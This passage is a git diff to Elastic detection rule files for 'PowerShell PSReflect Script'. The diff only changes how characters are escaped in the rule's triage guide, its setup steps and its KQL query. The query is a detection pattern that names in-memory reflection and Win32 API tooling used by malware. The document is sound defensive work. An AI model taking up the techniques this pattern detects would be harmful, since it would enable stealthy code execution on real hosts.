2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", @@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_106.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_106.json index a37cd2036d5..fa97f0dcee7 100644 --- a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_106.json +++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_106.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell PSReflect Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", @@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_107.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_107.json index 034f8a3986e..0ab82796bef 100644 --- a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_107.json +++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_107.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell PSReflect Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and not user.id : \"S-1-5-18\"\n", "references": [ "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", @@ -51,7 +51,7 @@ ], "risk_score": 47, "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", - "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell 